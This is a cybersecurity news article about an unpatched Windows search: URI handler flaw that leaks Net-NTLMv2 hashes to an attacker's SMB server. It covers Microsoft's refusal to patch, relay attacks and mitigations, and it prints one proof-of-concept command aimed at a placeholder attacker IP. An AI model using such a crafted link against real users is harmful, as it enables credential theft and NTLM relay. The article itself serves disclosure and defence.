Cybersecurity researchers have unveiled details of an unpatched vulnerability within the Windows operating system that could be exploited to disclose a user’s NTLMv2 hash to an attacker. This newly identified flaw, residing in the search: Uniform Resource Identifier (URI) handler, bears striking similarities to a previously patched vulnerability (CVE-2026-33829) affecting the Windows Snipping Tool’s ms-screensketch: URI handler. The discovery, attributed to researchers at Huntress, has ignited discussions within the cybersecurity community, particularly in light of Microsoft’s decision to decline a patch for the issue, citing its "Moderate" severity rating.
Understanding the New Vulnerability: The search: URI Handler Flaw
The core of the vulnerability lies in how Windows handles specific URI schemes, which are essentially protocols that allow applications to interact with the operating system and other programs. In this instance, the search: URI handler, designed to initiate search queries within Windows, can be manipulated to trigger an unintended NTLM authentication process. Specifically, the flaw leverages the crumb=location: parameter within the search: URI.
An attacker could craft a malicious link, embedding it within a seemingly innocuous web page, an email message, or another URL source. Should an unsuspecting user click this specially crafted link, the operating system would be compelled to connect to an attacker-controlled Server Message Block (SMB) server. This connection, initiated by the crumb=location: parameter pointing to a remote Universal Naming Convention (UNC) path, would trigger an NTLM authentication attempt. During this authentication handshake, the victim’s Net-NTLMv2 hash would be inadvertently disclosed to the attacker.
The command syntax demonstrating this exploitation is remarkably straightforward:
start "" "search:query=test&crumb=location:\10.0.1.100share"
In this example, 10.0.1.100 represents the attacker’s controlled SMB server, and share is a designated network share. When executed, this command prompts the victim’s system to attempt to authenticate with the specified SMB server, thereby leaking the NTLMv2 hash. The simplicity of this vector underscores its potential danger, as it requires minimal user interaction beyond clicking a link.
A Familiar Threat: The Precedent of CVE-2026-33829
The current search: URI handler vulnerability is not an isolated incident but rather a recurrence of a known pattern. Just months prior, in April 2026, Microsoft addressed CVE-2026-33829, a spoofing vulnerability that impacted the Windows Snipping Tool. This earlier flaw stemmed from the Snipping Tool’s ms-screensketch: URI handler, which accepted an unvalidated filePath parameter. Similar to the current discovery, the Snipping Tool’s handler would reach out to any UNC path provided to it, leading to the same NTLM authentication and subsequent Net-NTLMv2 hash disclosure.
Microsoft’s advisory for CVE-2026-33829 explicitly detailed the attack vector: "An attacker could induce the user into clicking a specially crafted link in a Web browser or other URL source, by embedding it in a Web page or email message. If the user approves the launching of the link, the crafted URL can induce the computer to connect to an SMB server of the attacker’s choosing, which would disclose the user’s NTLMv2 hash to the attacker, who could use this to authenticate as the user."
Huntress researcher Andrew Schwartz highlighted the striking similarities: "It used the same NTLM leakage mechanism, produced the same Net-NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating." This parallel raises significant questions about why a vulnerability employing an identical leakage mechanism and having the same severity rating would warrant a patch in one instance but not the other. The historical context further solidifies this pattern, as the use of a "crumb" parameter to steal NTLM hashes (CVE-2023-35636) was previously documented by Varonis in February 2024, specifically in relation to Outlook vulnerabilities. This demonstrates a persistent pattern of NTLM hash leakage through URI handler manipulation.
The Criticality of NTLMv2 Hashes and Relay Attacks
To fully appreciate the implications of this vulnerability, it is essential to understand what NTLMv2 hashes are and how they can be weaponized by threat actors. NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provide authentication, integrity, and confidentiality to users. While largely superseded by Kerberos in modern Windows domains, NTLM remains widely used in various scenarios, particularly in legacy systems, workgroup environments, and for backward compatibility.
An NTLMv2 hash is a cryptographic representation of a user’s password. Unlike storing the actual password in plain text, systems store hashes, which are one-way functions designed to be difficult to reverse engineer. However, these hashes are still incredibly sensitive. An attacker who captures an NTLMv2 hash can leverage it in two primary ways:
- Offline Cracking: While computationally intensive, sophisticated attackers can attempt to "crack" the hash offline using brute-force attacks, dictionary attacks, or rainbow tables. If successful, they recover the user’s original password, granting them full access.
- NTLM Relay Attacks: This is often the more immediate and potent threat. In an NTLM relay attack, the captured hash is not cracked but rather "relayed" directly to another service or machine on the network that accepts NTLM authentication. The attacker acts as a man-in-the-middle, intercepting the authentication attempt and replaying it to a target server. This allows the attacker to authenticate as the victim without ever knowing the actual password, facilitating lateral movement within a network, accessing sensitive resources, and escalating privileges. These attacks are particularly effective in environments where SMB signing is not enforced.
The long history of NTLM vulnerabilities underscores its persistent appeal to attackers. Despite Microsoft’s efforts to transition towards more secure authentication mechanisms like Kerberos, the prevalence of NTLM in older systems and certain configurations means that any new method of extracting NTLM hashes represents a significant security concern for organizations globally.
Chronology of Discovery, Disclosure, and Denial
The timeline of this vulnerability highlights the process of responsible disclosure and the subsequent divergence in opinion between security researchers and a major vendor.
- April 15, 2026: Huntress researchers, following their discovery of the
search:URI handler flaw, responsibly disclosed the details to Microsoft. This adheres to standard industry practice, allowing vendors a window to develop and release patches before public disclosure. - Following Disclosure: Microsoft conducted its internal assessment of the reported vulnerability. This process typically involves validating the flaw, assessing its severity, and determining the scope of affected products.
- Microsoft’s Decision: After its review, Microsoft declined to address the issue. Their official stance was that "only Important and Critical severity cases meet our bar for servicing." This categorization placed the
search:URI handler vulnerability, much like its Snipping Tool predecessor, into the "Moderate" severity tier, which Microsoft deemed insufficient for immediate patching. - June 03, 2026: Given Microsoft’s decision not to issue a fix, Huntress proceeded with public disclosure of the unpatched vulnerability. This move is often undertaken by security researchers to inform the wider community of active threats and encourage users and administrators to implement their own mitigations, especially when a vendor patch is unavailable.
This chronology underscores the tension that can arise between security researchers, who often prioritize the immediate mitigation of any exploitable flaw, and large software vendors, who must balance the severity of a vulnerability against the resources required for patching and the potential for disruption caused by updates.
The Implications of Microsoft’s Patching Policy
Microsoft’s decision to classify the search: URI handler vulnerability as "Moderate" and subsequently decline to patch it has significant implications for enterprise security and raises broader questions about vulnerability management. Microsoft’s severity ratings (Critical, Important, Moderate, Low) are designed to guide organizations on the urgency of applying security updates.
A "Moderate" rating, while not as alarming as "Critical" or "Important," still indicates a vulnerability that could be exploited to compromise a system or disclose sensitive information. The specific justification – that "only Important and Critical severity cases meet our bar for servicing" – suggests a threshold-based approach to patching. This policy, while understandable from a resource allocation perspective for a company managing a vast ecosystem of products, can be problematic for security professionals.
For an NTLMv2 hash disclosure vulnerability, even one requiring user interaction, the practical risk can be substantial. Social engineering techniques, such as phishing emails or malicious websites, are highly effective at inducing users to click links. Once an NTLMv2 hash is captured, the subsequent NTLM relay attacks can lead to full domain compromise if not properly mitigated. In the context of the current threat landscape, where ransomware and sophisticated nation-state attacks frequently leverage lateral movement and credential theft, a "Moderate" rating for a hash disclosure flaw might be perceived as understating the real-world danger by many security experts.
The differing response to the ms-screensketch: (patched) and search: (unpatched) vulnerabilities, despite their technical similarities and identical severity ratings, further complicates the understanding of Microsoft’s patching rationale. This inconsistency can create confusion for IT administrators trying to prioritize their defenses. It effectively shifts the burden of protection from the vendor to the end-user organizations, requiring them to implement proactive mitigation strategies in the absence of an official fix.
Mitigation Strategies and Proactive Defense
In the absence of a direct patch from Microsoft, organizations are advised to implement several critical mitigation strategies to protect against NTLMv2 hash disclosure and NTLM relay attacks. These measures are robust defenses against not only this specific vulnerability but also a broader range of NTLM-based threats.
- Block Outbound SMB (TCP/445 and TCP/139): This is arguably the most effective and fundamental mitigation. By blocking outbound Server Message Block (SMB) traffic on Transmission Control Protocol (TCP) ports 445 and 139, organizations can prevent endpoints from connecting to arbitrary external SMB servers. This directly thwarts the attack vector, as the crafted URI handler relies on establishing an SMB connection to an attacker-controlled server to exfiltrate the hash. It is crucial to implement this at the network perimeter (firewalls) and, where feasible, on individual host firewalls for endpoints that do not legitimately require outbound SMB connectivity.
- Enforce SMB Signing: SMB signing is a security feature that adds a digital signature to each SMB packet. This signature ensures the integrity of the data and authenticates the sender, making NTLM relay attacks significantly more difficult. If SMB signing is enforced on target servers, an attacker’s relayed hash, even if captured, cannot be used to authenticate because the relayed session would lack the proper signature. Organizations should enforce SMB signing on all critical servers, especially Domain Controllers, to prevent an attacker from using captured hashes for lateral movement.
- Disable NTLM Where Applicable: For environments that have fully transitioned to Kerberos or other modern authentication protocols, disabling NTLM entirely is the most secure long-term solution. This can be complex in large, heterogeneous environments with legacy applications or devices that still rely on NTLM. However, for specific systems or segments of the network where NTLM is not a strict requirement, disabling it eliminates the attack surface for NTLM hash theft.
- User Education and Awareness: While technical controls are paramount, educating users about the dangers of clicking suspicious links in emails or on untrusted websites remains a vital layer of defense. Phishing awareness training can help reduce the likelihood of the initial exploitation.
- Endpoint Detection and Response (EDR) Solutions: Deploying robust EDR solutions can help detect and alert on suspicious outbound SMB connections, unusual NTLM authentication attempts, or other indicators of compromise that might arise from an attempted exploitation of this or similar vulnerabilities.
Broader Cybersecurity Context and Outlook
The disclosure of this unpatched search: URI handler vulnerability serves as a stark reminder of the persistent challenges posed by legacy protocols and the intricate nature of modern operating systems. Despite continuous advancements in security, attackers consistently find new ways to exploit older functionalities or subtle implementation flaws. NTLM, being a foundational but aging authentication protocol, remains a prime target due to its widespread presence and the high value of its hashes.
The role of responsible disclosure by cybersecurity research firms like Huntress is critical in this evolving landscape. By identifying and reporting these vulnerabilities, even when vendors decline to patch, they empower the broader security community to understand potential risks and implement their own protective measures.
Ultimately, this incident underscores the necessity for organizations to adopt a comprehensive, defense-in-depth security strategy. Relying solely on vendor patches is insufficient; proactive network segmentation, robust authentication policies, continuous monitoring, and employee education are indispensable components of a resilient cybersecurity posture in an environment where not every discovered flaw will receive an official fix. The ongoing battle against NTLM-related vulnerabilities is a testament to the fact that foundational security hygiene remains paramount in safeguarding digital assets against an ever-adapting adversary.
